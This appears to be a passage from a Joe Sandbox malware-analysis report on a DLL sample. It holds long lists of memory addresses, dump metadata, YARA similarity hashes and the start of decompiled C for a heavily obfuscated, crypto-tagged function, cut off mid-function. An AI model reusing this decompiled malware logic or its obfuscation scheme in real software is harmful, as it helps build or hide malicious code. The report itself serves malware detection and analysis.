                                                                                                          0x02ae3c94
                                                                                                          0x02ae3c9f
                                                                                                          0x02ae3caa
                                                                                                          0x02ae3cb2
                                                                                                          0x02ae3cba
                                                                                                          0x02ae3cbf
                                                                                                          0x02ae3cc7
                                                                                                          0x02ae3ccf
                                                                                                          0x02ae3cd7
                                                                                                          0x02ae3cdb
                                                                                                          0x02ae3ce0
                                                                                                          0x02ae3ce5
                                                                                                          0x02ae3ced
                                                                                                          0x02ae3cf8
                                                                                                          0x02ae3d03
                                                                                                          0x02ae3d0e
                                                                                                          0x02ae3d1c
                                                                                                          0x02ae3d25
                                                                                                          0x02ae3d29
                                                                                                          0x02ae3d31
                                                                                                          0x02ae3d3c
                                                                                                          0x02ae3d47
                                                                                                          0x02ae3d52
                                                                                                          0x02ae3d5d
                                                                                                          0x02ae3d68
                                                                                                          0x02ae3d73
                                                                                                          0x02ae3d7e
                                                                                                          0x02ae3d89
                                                                                                          0x02ae3d91
                                                                                                          0x02ae3d9c
                                                                                                          0x02ae3da7
                                                                                                          0x02ae3daf
                                                                                                          0x02ae3dba
                                                                                                          0x02ae3dc2
                                                                                                          0x02ae3dca
                                                                                                          0x02ae3dd2
                                                                                                          0x02ae3ddc
                                                                                                          0x02ae3de4
                                                                                                          0x02ae3df9
                                                                                                          0x02ae3dfc
                                                                                                          0x02ae3e03
                                                                                                          0x02ae3e0e
                                                                                                          0x02ae3e19
                                                                                                          0x02ae3e2f
                                                                                                          0x02ae3e36
                                                                                                          0x02ae3e41
                                                                                                          0x02ae3e4c
                                                                                                          0x02ae3e54
                                                                                                          0x02ae3e5f
                                                                                                          0x02ae3e6a
                                                                                                          0x02ae3e7d
                                                                                                          0x02ae3e80
                                                                                                          0x02ae3e87
                                                                                                          0x02ae3e92
                                                                                                          0x02ae3e9d
                                                                                                          0x02ae3eb0
                                                                                                          0x02ae3eb7
                                                                                                          0x02ae3ec2
                                                                                                          0x02ae3ecd
                                                                                                          0x02ae3ee3
                                                                                                          0x02ae3eea
                                                                                                          0x02ae3ef5
                                                                                                          0x02ae3f00
                                                                                                          0x02ae3f08
                                                                                                          0x02ae3f13
                                                                                                          0x02ae3f1e
                                                                                                          0x02ae3f30
                                                                                                          0x02ae3f33
                                                                                                          0x02ae3f3a
                                                                                                          0x02ae3f42
                                                                                                          0x02ae3f4d
                                                                                                          0x02ae3f58
                                                                                                          0x02ae3f60
                                                                                                          0x02ae3f6b
                                                                                                          0x02ae3f7e
                                                                                                          0x02ae3f85
                                                                                                          0x02ae3f90
                                                                                                          0x02ae3f98
                                                                                                          0x02ae3fa0
                                                                                                          0x02ae3fa8
                                                                                                          0x02ae3fb0
                                                                                                          0x02ae3fb8
                                                                                                          0x02ae3fc0
                                                                                                          0x02ae3fcd
                                                                                                          0x02ae3fd1
                                                                                                          0x02ae3fd9
                                                                                                          0x02ae3fe1
                                                                                                          0x02ae3fec
                                                                                                          0x02ae3ff7
                                                                                                          0x02ae4002
                                                                                                          0x02ae400d
                                                                                                          0x02ae4018
                                                                                                          0x02ae4023
                                                                                                          0x02ae402e
                                                                                                          0x02ae4036
                                                                                                          0x02ae403e
                                                                                                          0x02ae4049
                                                                                                          0x02ae4054
                                                                                                          0x02ae405f
                                                                                                          0x02ae406a
                                                                                                          0x02ae4077
                                                                                                          0x02ae4082
                                                                                                          0x02ae408e
                                                                                                          0x02ae4095
                                                                                                          0x02ae409a
                                                                                                          0x02ae40a3
                                                                                                          0x02ae40ae
                                                                                                          0x02ae40b9
                                                                                                          0x02ae40cc
                                                                                                          0x02ae40cf
                                                                                                          0x02ae40d6
                                                                                                          0x02ae40e1
                                                                                                          0x02ae40f4
                                                                                                          0x02ae40fb
                                                                                                          0x02ae4106
                                                                                                          0x02ae4111
                                                                                                          0x02ae4119
                                                                                                          0x02ae4126
                                                                                                          0x02ae412a
                                                                                                          0x02ae412f
                                                                                                          0x02ae4137
                                                                                                          0x02ae4142
                                                                                                          0x02ae414a
                                                                                                          0x02ae4155
                                                                                                          0x02ae4165
                                                                                                          0x02ae4169
                                                                                                          0x02ae416e
                                                                                                          0x02ae4176
                                                                                                          0x02ae417e
                                                                                                          0x02ae4189
                                                                                                          0x02ae4194
                                                                                                          0x02ae419f
                                                                                                          0x02ae41aa
                                                                                                          0x02ae41b2
                                                                                                          0x02ae41b7
                                                                                                          0x02ae41c4
                                                                                                          0x02ae41c5
                                                                                                          0x02ae41c9
                                                                                                          0x02ae41d1
                                                                                                          0x02ae41dc
                                                                                                          0x02ae41e7
                                                                                                          0x02ae41f2
                                                                                                          0x02ae41ff
                                                                                                          0x02ae4209
                                                                                                          0x02ae420d
                                                                                                          0x02ae4212
                                                                                                          0x02ae421a
                                                                                                          0x02ae4222
                                                                                                          0x02ae422a
                                                                                                          0x02ae4232
                                                                                                          0x02ae423a
                                                                                                          0x02ae4242
                                                                                                          0x02ae424a
                                                                                                          0x02ae4252
                                                                                                          0x02ae425a
                                                                                                          0x02ae425f
                                                                                                          0x02ae4267
                                                                                                          0x02ae4267
                                                                                                          0x02ae4267
                                                                                                          0x02ae426c
                                                                                                          0x02ae4271
                                                                                                          0x02ae4271
                                                                                                          0x02ae4276
                                                                                                          0x02ae4276
                                                                                                          0x02ae4276
                                                                                                          0x02ae4276
                                                                                                          0x02ae4278
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae4628
                                                                                                          0x02ae462e
                                                                                                          0x02ae4707
                                                                                                          0x02ae4714
                                                                                                          0x02ae471b
                                                                                                          0x02ae471d
                                                                                                          0x02ae471d
                                                                                                          0x02ae4722
                                                                                                          0x02ae4727
                                                                                                          0x00000000
                                                                                                          0x02ae4727
                                                                                                          0x02ae4634
                                                                                                          0x02ae4636
                                                                                                          0x02ae464e
                                                                                                          0x02ae465a
                                                                                                          0x02ae4661
                                                                                                          0x02ae466c
                                                                                                          0x02ae4690
                                                                                                          0x02ae46c7
                                                                                                          0x02ae46de
                                                                                                          0x02ae46ef
                                                                                                          0x02ae46f4
                                                                                                          0x02ae43ef
                                                                                                          0x02ae43ef
                                                                                                          0x00000000
                                                                                                          0x02ae43ef
                                                                                                          0x02ae4638
                                                                                                          0x02ae463e
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae4644
                                                                                                          0x02ae4644
                                                                                                          0x02ae427e
                                                                                                          0x02ae44d1
                                                                                                          0x02ae44dd
                                                                                                          0x02ae44e1
                                                                                                          0x02ae44ec
                                                                                                          0x02ae44f1
                                                                                                          0x02ae44fa
                                                                                                          0x02ae44fc
                                                                                                          0x02ae4500
                                                                                                          0x02ae450e
                                                                                                          0x02ae4526
                                                                                                          0x02ae452d
                                                                                                          0x02ae4534
                                                                                                          0x02ae4543
                                                                                                          0x02ae4551
                                                                                                          0x02ae455c
                                                                                                          0x02ae456a
                                                                                                          0x02ae4571
                                                                                                          0x02ae4579
                                                                                                          0x02ae45d3
                                                                                                          0x02ae45e3
                                                                                                          0x02ae45fb
                                                                                                          0x02ae461b
                                                                                                          0x02ae4620
                                                                                                          0x02ae44c7
                                                                                                          0x02ae44c7
                                                                                                          0x00000000
                                                                                                          0x02ae44c7
                                                                                                          0x02ae428a
                                                                                                          0x02ae43f9
                                                                                                          0x02ae4405
                                                                                                          0x02ae440c
                                                                                                          0x02ae4414
                                                                                                          0x02ae4419
                                                                                                          0x02ae4427
                                                                                                          0x02ae442e
                                                                                                          0x02ae447a
                                                                                                          0x02ae448e
                                                                                                          0x02ae449f
                                                                                                          0x02ae44bf
                                                                                                          0x02ae44c4
                                                                                                          0x00000000
                                                                                                          0x02ae44c4
                                                                                                          0x02ae4292
                                                                                                          0x02ae4311
                                                                                                          0x02ae431d
                                                                                                          0x02ae4321
                                                                                                          0x02ae4334
                                                                                                          0x02ae433a
                                                                                                          0x02ae4349
                                                                                                          0x02ae435e
                                                                                                          0x02ae437e
                                                                                                          0x02ae43a9
                                                                                                          0x02ae43b2
                                                                                                          0x02ae43b7
                                                                                                          0x02ae43ba
                                                                                                          0x02ae43c1
                                                                                                          0x02ae43ca
                                                                                                          0x02ae43c3
                                                                                                          0x02ae43c5
                                                                                                          0x02ae43c7
                                                                                                          0x02ae43c7
                                                                                                          0x02ae43e7
                                                                                                          0x02ae43ec
                                                                                                          0x00000000
                                                                                                          0x02ae43ec
                                                                                                          0x02ae4296
                                                                                                          0x02ae42e9
                                                                                                          0x02ae42ee
                                                                                                          0x02ae42ef
                                                                                                          0x02ae42f8
                                                                                                          0x02ae42fa
                                                                                                          0x02ae42fd
                                                                                                          0x02ae4302
                                                                                                          0x02ae4306
                                                                                                          0x02ae4309
                                                                                                          0x00000000
                                                                                                          0x02ae4309
                                                                                                          0x02ae429a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae42b9
                                                                                                          0x02ae42c2
                                                                                                          0x02ae42cc
                                                                                                          0x02ae472c
                                                                                                          0x02ae472c
                                                                                                          0x02ae472c
                                                                                                          0x00000000
                                                                                                          0x02ae4738

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: !Sw$)<L$Et$L$R$T9$Vdd$_EBM$sv$zj$J'$c${
                                                                                                          • API String ID: 0-2179300830
                                                                                                          • Opcode ID: 075683778e307046975d47ce0d336f465a81873e419ee508acf3eb14e33a2ad5
                                                                                                          • Instruction ID: 47ff71eeda3f0c4a6039454fde044bb03ffdb830469de49698d700a332d91eee
                                                                                                          • Opcode Fuzzy Hash: 075683778e307046975d47ce0d336f465a81873e419ee508acf3eb14e33a2ad5
                                                                                                          • Instruction Fuzzy Hash: 0C92ED715093819FD7B9CF25C58AB9FBBE2BBC4304F10891DE1DA96260DBB18949CF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AF67E6, Relevance: 17.0, Strings: 13, Instructions: 728COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 549 2af67e6-2af750a call 2affe29 552 2af7511 549->552 553 2af7516 552->553 554 2af751a-2af7520 553->554 555 2af7526 554->555 556 2af76b5-2af76b7 554->556 559 2af752c-2af7532 555->559 560 2af76ab-2af76b0 555->560 557 2af76bd-2af76c3 556->557 558 2af7772-2af7775 556->558 563 2af7749-2af776d call 2aeef0c 557->563 564 2af76c9-2af76cf 557->564 561 2af7777-2af77a4 call 2afe1f8 558->561 562 2af77a6 558->562 565 2af768b-2af76a6 call 2ae4bfc 559->565 566 2af7538-2af753e 559->566 560->554 570 2af77ad-2af77ef 561->570 562->570 586 2af75fc-2af7603 563->586 568 2af792e-2af7944 call 2afe358 564->568 569 2af76d5-2af76db 564->569 565->586 571 2af762a-2af7686 call 2aedda9 call 2b02b09 566->571 572 2af7544-2af754a 566->572 600 2af7945-2af7951 568->600 576 2af76dd-2af76e3 569->576 577 2af76f3-2af76f7 569->577 578 2af77f7-2af7862 call 2ae4a88 call 2affecb 570->578 579 2af77f1 570->579 613 2af7915-2af791c 571->613 582 2af7608-2af7628 call 2afe358 572->582 583 2af7550-2af7556 572->583 587 2af76e9-2af76ee 576->587 588 2af7921-2af7927 576->588 590 2af76f9-2af7703 577->590 591 2af7705 577->591 615 2af7868-2af789c call 2b03e0e 578->615 616 2af7910 578->616 579->578 606 2af75fa-2af75fb 582->606 595 2af75dd-2af75f5 call 2afe358 583->595 596 2af755c-2af7563 583->596 586->552 587->554 599 2af7929 588->599 588->600 601 2af7707-2af7744 call 2b010dc 590->601 591->601 595->606 596->588 604 2af7569-2af75d8 call 2aeed66 596->604 599->553 601->586 604->554 606->586 613->588 619 2af789e-2af7903 call 2afc8cf call 2b03e0e 615->619 620 2af7906-2af790b 615->620 616->613 619->620 620->586
                                                                                                          C-Code - Quality: 94%
                                                                                                          			E02AF67E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int* _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				intOrPtr _v4;
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _t846;
				intOrPtr _t847;
				signed int _t861;
				void* _t866;
				signed int _t867;
				signed int _t874;
				signed int* _t876;
				signed int _t885;
				void* _t937;
				signed int _t946;
				signed int _t960;
				signed int _t961;
				signed int _t962;
				signed int _t963;
				signed int _t964;
				signed int _t965;
				signed int _t966;
				signed int _t967;
				signed int _t968;
				signed int _t969;
				signed int _t970;
				signed int _t971;
				signed int _t972;
				signed int _t973;
				signed int _t974;
				signed int _t975;
				signed int _t976;
				signed int _t978;
				signed int _t980;
				signed int _t985;
				signed int _t986;
				signed int* _t989;
				void* _t991;

				_t876 = _a28;
				_push(_a48);
				_push(_a44);
				_v4 = __ecx;
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_t876);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_a20 & 0x0000ffff);
				_v304 = 0x84e682;
				_t989 =  &(( &_v304)[0xe]);
				_v304 = _v304 + 0xeb1b;
				_v304 = _v304 ^ 0x0f7f391c;
				_v304 = _v304 ^ 0x0ffae881;
				_t874 = 0;
				_v80 = 0xd03450;
				_t978 = 0x7e00160;
				_v80 = _v80 + 0x474c;
				_v80 = _v80 ^ 0x00d07b8f;
				_v40 = 0x62fb41;
				_v40 = _v40 ^ 0x58566629;
				_v40 = _v40 ^ 0x58349da0;
				_v56 = 0xe1b746;
				_v56 = _v56 + 0x8be3;
				_v56 = _v56 ^ 0x00e2c329;
				_v32 = 0xe6e4c5;
				_v32 = _v32 + 0xfb3f;
				_v32 = _v32 ^ 0x00e7a004;
				_v164 = 0x3535e2;
				_v164 = _v164 + 0xb15e;
				_v164 = _v164 + 0xffff4c2e;
				_v164 = _v164 ^ 0x0075336e;
				_v256 = 0xe056c0;
				_v256 = _v256 >> 0xf;
				_v12 = 0;
				_t960 = 0xf;
				_v256 = _v256 / _t960;
				_t961 = 0x75;
				_v256 = _v256 / _t961;
				_v256 = _v256 ^ 0x00040000;
				_v64 = 0xc12004;
				_v64 = _v64 | 0x05a7924d;
				_v64 = _v64 ^ 0x01e7b24d;
				_v200 = 0x3d9b4;
				_v200 = _v200 + 0xffffba05;
				_t962 = 0x4d;
				_push("true");
				_v200 = _v200 / _t962;
				_v200 = _v200 >> 0xa;
				_v200 = _v200 ^ 0x00080002;
				_v264 = 0xdbb33c;
				_pop(_t963);
				_v264 = _v264 / _t963;
				_v264 = _v264 ^ 0x3bde5a68;
				_t964 = 0x74;
				_v264 = _v264 * 0x67;
				_v264 = _v264 ^ 0x14497559;
				_v172 = 0x2a3d0;
				_v172 = _v172 + 0xffff520a;
				_v172 = _v172 + 0xffffc196;
				_v172 = _v172 ^ 0x0001b670;
				_v16 = 0x40a0dc;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x8000040a;
				_v280 = 0x3a90ef;
				_v280 = _v280 + 0xfffff29b;
				_v280 = _v280 + 0xd15d;
				_v280 = _v280 + 0xffff2fb1;
				_v280 = _v280 ^ 0x003a8498;
				_v276 = 0x2b48bd;
				_v276 = _v276 * 0x59;
				_v276 = _v276 | 0x0b3e9c0e;
				_v276 = _v276 + 0x2f0e;
				_v276 = _v276 ^ 0x0f3f0c8c;
				_v244 = 0xf133cf;
				_v244 = _v244 * 0x50;
				_v244 = _v244 >> 0xe;
				_v244 = _v244 >> 2;
				_v244 = _v244 ^ 0x00004b7f;
				_v220 = 0x48bde3;
				_v220 = _v220 * 7;
				_v220 = _v220 << 3;
				_v220 = _v220 << 7;
				_v220 = _v220 ^ 0xf4c4d41f;
				_v152 = 0xdfcbbb;
				_v152 = _v152 / _t964;
				_v152 = _v152 ^ 0x15954f38;
				_v152 = _v152 ^ 0x1594a2df;
				_v236 = 0x79b2d;
				_v236 = _v236 + 0xffffa56f;
				_v236 = _v236 >> 0xc;
				_v236 = _v236 + 0xffff51ce;
				_v236 = _v236 ^ 0xffff5342;
				_v300 = 0x53b7c5;
				_v300 = _v300 | 0xbc55bbc8;
				_v300 = _v300 >> 0xb;
				_v300 = _v300 * 0x4a;
				_v300 = _v300 ^ 0x06ca0610;
				_v300 = 0x831a37;
				_v300 = _v300 >> 0xa;
				_v300 = _v300 ^ 0xf07c3cef;
				_v300 = _v300 >> 2;
				_v300 = _v300 ^ 0x3c15b978;
				_v296 = 0xbc94b;
				_v296 = _v296 ^ 0xc913797f;
				_v296 = _v296 ^ 0xc91ffb85;
				_v304 = 0xeb47f;
				_v304 = _v304 * 0x21;
				_v304 = _v304 >> 9;
				_v304 = _v304 ^ 0x00079d5b;
				_v296 = 0x863d92;
				_v296 = _v296 | 0xc3fe325e;
				_v296 = _v296 ^ 0xc3f15d89;
				_v304 = 0x8c9292;
				_v304 = _v304 * 0x65;
				_v304 = _v304 * 0x2f;
				_v304 = _v304 ^ 0x2ea0d0e4;
				_v296 = 0x7998c8;
				_v296 = _v296 * 0x1f;
				_v296 = _v296 ^ 0x0ebe6fc9;
				_v304 = 0xc13eda;
				_v304 = _v304 + 0x239b;
				_v304 = _v304 | 0x8aa80eb1;
				_v304 = _v304 ^ 0x8ae5aa52;
				_v304 = 0x2ac635;
				_t965 = 3;
				_v304 = _v304 * 0x1a;
				_v304 = _v304 | 0xa2ccc89a;
				_v304 = _v304 ^ 0xa6da26ac;
				_v296 = 0xd161a;
				_v296 = _v296 >> 0xb;
				_v296 = _v296 ^ 0x00086437;
				_v300 = 0xc8d906;
				_v300 = _v300 << 5;
				_v300 = _v300 / _t965;
				_v300 = _v300 | 0xd3e5db7e;
				_v300 = _v300 ^ 0xdbffc0c3;
				_v304 = 0xa90eaa;
				_t966 = 0x62;
				_v304 = _v304 / _t966;
				_v304 = _v304 ^ 0xa321830c;
				_v304 = _v304 ^ 0xa32eb72c;
				_v296 = 0xc9c90e;
				_v296 = _v296 ^ 0x29ac5136;
				_v296 = _v296 ^ 0x296c2187;
				_v168 = 0xb8ba74;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 | 0xd39b7801;
				_v168 = _v168 ^ 0xd39a1a13;
				_v240 = 0xce03d4;
				_v240 = _v240 + 0xffff6ba1;
				_v240 = _v240 + 0xffff3730;
				_t967 = 0x7e;
				_v240 = _v240 / _t967;
				_v240 = _v240 ^ 0x00015c8a;
				_v144 = 0x76dd98;
				_v144 = _v144 << 0xa;
				_t968 = 0xb;
				_v144 = _v144 / _t968;
				_v144 = _v144 ^ 0x13f9c089;
				_v88 = 0xd6758c;
				_t969 = 0x7c;
				_v88 = _v88 * 0x7d;
				_v88 = _v88 ^ 0x68b07bf0;
				_v112 = 0x136ce2;
				_v112 = _v112 * 0x7a;
				_v112 = _v112 ^ 0x094e8b6c;
				_v160 = 0xc781f4;
				_v160 = _v160 + 0x7b6;
				_v160 = _v160 ^ 0xd2a6870e;
				_v160 = _v160 ^ 0xd267b3cc;
				_v216 = 0x3cec52;
				_v216 = _v216 / _t969;
				_v216 = _v216 + 0xe7c2;
				_v216 = _v216 + 0x185f;
				_v216 = _v216 ^ 0x00083478;
				_v128 = 0xe8ace2;
				_v128 = _v128 + 0xffff5a4b;
				_v128 = _v128 >> 5;
				_v128 = _v128 ^ 0x00080537;
				_v20 = 0xba5f1f;
				_t970 = 0x28;
				_v20 = _v20 / _t970;
				_v20 = _v20 ^ 0x00097bc9;
				_v184 = 0x868bed;
				_v184 = _v184 ^ 0x5d9bbcc4;
				_t971 = 0x15;
				_t985 = 0x61;
				_v184 = _v184 * 0x7e;
				_v184 = _v184 ^ 0xd4635941;
				_v248 = 0xc6bb26;
				_v248 = _v248 + 0x4226;
				_v248 = _v248 + 0x1eaa;
				_v248 = _v248 + 0x143f;
				_v248 = _v248 ^ 0x00cd4d4f;
				_v124 = 0x1449aa;
				_v124 = _v124 >> 7;
				_v124 = _v124 + 0xffff4698;
				_v124 = _v124 ^ 0xfffccf45;
				_v204 = 0xd9ae2a;
				_v204 = _v204 * 0x25;
				_v204 = _v204 | 0x41acc33e;
				_v204 = _v204 + 0xe9b9;
				_v204 = _v204 ^ 0x5ff1a5de;
				_v104 = 0x27630a;
				_v104 = _v104 | 0x34992b3f;
				_v104 = _v104 ^ 0x34bda39f;
				_v28 = 0xa04064;
				_v28 = _v28 | 0x72e9e7d8;
				_v28 = _v28 ^ 0x72e1f0ab;
				_v48 = 0xc4ba01;
				_v48 = _v48 << 7;
				_v48 = _v48 ^ 0x6259539c;
				_v180 = 0x3340f4;
				_v180 = _v180 | 0x3035b2e2;
				_v180 = _v180 << 9;
				_v180 = _v180 ^ 0x6feb3ded;
				_v232 = 0x2e047a;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 * 0x12;
				_v232 = _v232 / _t971;
				_v232 = _v232 ^ 0x0002c217;
				_v72 = 0x299f12;
				_v72 = _v72 << 3;
				_v72 = _v72 ^ 0x0148e07c;
				_v188 = 0xf414db;
				_v188 = _v188 << 0x10;
				_v188 = _v188 / _t985;
				_v188 = _v188 ^ 0x003bf194;
				_v156 = 0xc18fa7;
				_t986 = 0x6b;
				_v156 = _v156 / _t986;
				_t972 = 0xc;
				_v156 = _v156 / _t972;
				_v156 = _v156 ^ 0x0009860f;
				_v208 = 0xbb24e8;
				_v208 = _v208 + 0xd4bb;
				_v208 = _v208 + 0xffffec33;
				_t973 = 0x26;
				_v208 = _v208 / _t973;
				_v208 = _v208 ^ 0x000d494f;
				_v92 = 0xf4dbce;
				_v92 = _v92 + 0x5ee7;
				_v92 = _v92 ^ 0x00f22c8f;
				_v100 = 0x7239d1;
				_v100 = _v100 | 0x01f5add3;
				_v100 = _v100 ^ 0x01f71b27;
				_v292 = 0x4b72c4;
				_t974 = 0x61;
				_v292 = _v292 * 0xb;
				_v292 = _v292 + 0xfffff18f;
				_v292 = _v292 * 0xc;
				_v292 = _v292 ^ 0x26e66304;
				_v224 = 0xeae701;
				_v224 = _v224 << 1;
				_v224 = _v224 << 6;
				_v224 = _v224 | 0xd938d457;
				_v224 = _v224 ^ 0xfd70504c;
				_v108 = 0xa91a4c;
				_v108 = _v108 << 2;
				_v108 = _v108 ^ 0x02a24d10;
				_v68 = 0x46e95;
				_v68 = _v68 ^ 0x636abfcf;
				_v68 = _v68 ^ 0x636edf46;
				_v76 = 0x93e843;
				_v76 = _v76 | 0xba39a6db;
				_v76 = _v76 ^ 0xbaba9d8f;
				_v84 = 0xd50ea2;
				_v84 = _v84 | 0x50ec9d25;
				_v84 = _v84 ^ 0x50f8ba70;
				_v288 = 0x52484f;
				_v288 = _v288 + 0xb430;
				_v288 = _v288 * 0x4c;
				_v288 = _v288 >> 0xb;
				_v288 = _v288 ^ 0x000d4af8;
				_v284 = 0x2da3fa;
				_v284 = _v284 | 0xb3c63afe;
				_v284 = _v284 ^ 0xfce0d7d7;
				_v284 = _v284 + 0xffff4c41;
				_v284 = _v284 ^ 0x4f0e5b87;
				_v52 = 0xe252ad;
				_v52 = _v52 | 0x3c4f00b6;
				_v52 = _v52 ^ 0x3cecbbb2;
				_v60 = 0xab577e;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0x55a8aa1a;
				_v148 = 0x5c065f;
				_v148 = _v148 << 0x10;
				_v148 = _v148 / _t986;
				_v148 = _v148 ^ 0x00079968;
				_v252 = 0xfb0d10;
				_v252 = _v252 / _t974;
				_v252 = _v252 << 0x10;
				_v252 = _v252 ^ 0x25f2b671;
				_v252 = _v252 ^ 0xb36c8d69;
				_v260 = 0x776100;
				_v260 = _v260 >> 0x10;
				_v260 = _v260 | 0xe8d0a90c;
				_v260 = _v260 * 0x14;
				_v260 = _v260 ^ 0x304a111f;
				_v268 = 0x4079f3;
				_v268 = _v268 >> 4;
				_t975 = 0x4f;
				_v268 = _v268 * 0x5f;
				_v268 = _v268 + 0x21c5;
				_v268 = _v268 ^ 0x017b7447;
				_v44 = 0x101fed;
				_v44 = _v44 ^ 0x1e85c214;
				_v44 = _v44 ^ 0x1e9d5cc7;
				_v140 = 0xb56248;
				_v140 = _v140 >> 0xb;
				_v140 = _v140 ^ 0xb0648700;
				_v140 = _v140 ^ 0xb06b52ff;
				_v228 = 0x5d2032;
				_v228 = _v228 + 0xe696;
				_v228 = _v228 + 0x90e;
				_v228 = _v228 << 6;
				_v228 = _v228 ^ 0x178d1a7f;
				_v192 = 0x46faa8;
				_v192 = _v192 / _t975;
				_v192 = _v192 + 0x59ff;
				_v192 = _v192 ^ 0x00002efb;
				_v272 = 0x13fbcb;
				_v272 = _v272 + 0xffff66dd;
				_v272 = _v272 * 0x5d;
				_v272 = _v272 + 0xffff70cc;
				_v272 = _v272 ^ 0x070467b9;
				_v136 = 0xda75c;
				_v136 = _v136 << 0xe;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0xd703a46a;
				_v24 = 0x98e6;
				_v24 = _v24 | 0x30837cf6;
				_v24 = _v24 ^ 0x308cf6e6;
				_v196 = 0x2348e5;
				_v196 = _v196 + 0xec0b;
				_v196 = _v196 + 0xffff4f76;
				_v196 = _v196 + 0xffff4b3e;
				_v196 = _v196 ^ 0x002962b3;
				_v176 = 0x7bcaf7;
				_v176 = _v176 * 0x37;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0xa986161e;
				_v120 = 0x3fa34;
				_v120 = _v120 * 0x49;
				_v120 = _v120 >> 7;
				_v120 = _v120 ^ 0x00066829;
				_v116 = 0x9c5c94;
				_v116 = _v116 + 0x20fd;
				_v116 = _v116 >> 2;
				_v116 = _v116 ^ 0x0025da20;
				_v212 = 0x6b8402;
				_v212 = _v212 + 0x9bc6;
				_v212 = _v212 * 0x74;
				_v212 = _v212 + 0xe621;
				_v212 = _v212 ^ 0x30fe6560;
				_v96 = 0xbe9741;
				_v96 = _v96 + 0xffffd77c;
				_v96 = _v96 ^ 0x00bbad9c;
				_v304 = 0xe465cf;
				_v304 = _v304 >> 4;
				_v304 = _v304 << 5;
				_v304 = _v304 ^ 0x01c3ad6d;
				_v296 = 0xc47264;
				_v296 = _v296 << 0xc;
				_v296 = _v296 ^ 0x4720cdbf;
				_v132 = 0x7ca780;
				_v132 = _v132 + 0xa093;
				_v132 = _v132 << 7;
				_v132 = _v132 ^ 0x3ea11d20;
				_t976 = _v8;
				_t987 = _v8;
				while(1) {
					L1:
					_t937 = 0xd154a5a;
					while(1) {
						_t846 = _v300;
						while(1) {
							L3:
							_t991 = _t978 - 0x7e00160;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								_t978 = 0xfd2ad77;
								continue;
							} else {
								if(_t978 == 0x1a1d1c) {
									__eflags = E02AE4BFC(_t976, _a16);
									_t978 = 0x6a5d586;
									_t866 = 1;
									_t874 =  !=  ? _t866 : _t874;
									goto L13;
								} else {
									if(_t978 == 0x352276a) {
										_t867 = E02AEDDA9(_v168, _t876, _v280, _t876, _v240, _v144, _t876, _v88, _v112);
										_t987 = _t867;
										__eflags = _t867;
										_t978 =  !=  ? 0x6fee97d : 0xb1727d5;
										E02B02B09(_v160, 0, _v216, _v128);
										_t989 =  &(_t989[0xa]);
										L39:
										_t876 = _a28;
										_t937 = 0xd154a5a;
										goto L40;
									} else {
										if(_t978 == 0x6a5d586) {
											E02AFE358(_v196, _v176, _t976, _v120);
											_t978 = 0x6d75a8e;
											goto L12;
										} else {
											if(_t978 == 0x6d75a8e) {
												E02AFE358(_v116, _v212, _t846, _v96);
												_t978 = 0xedc04fb;
												L12:
												L13:
												_t876 = _a28;
												goto L1;
											} else {
												if(_t978 != 0x6fee97d) {
													L40:
													__eflags = _t978 - 0xb1727d5;
													if(_t978 != 0xb1727d5) {
														_t846 = _v300;
														continue;
													}
												} else {
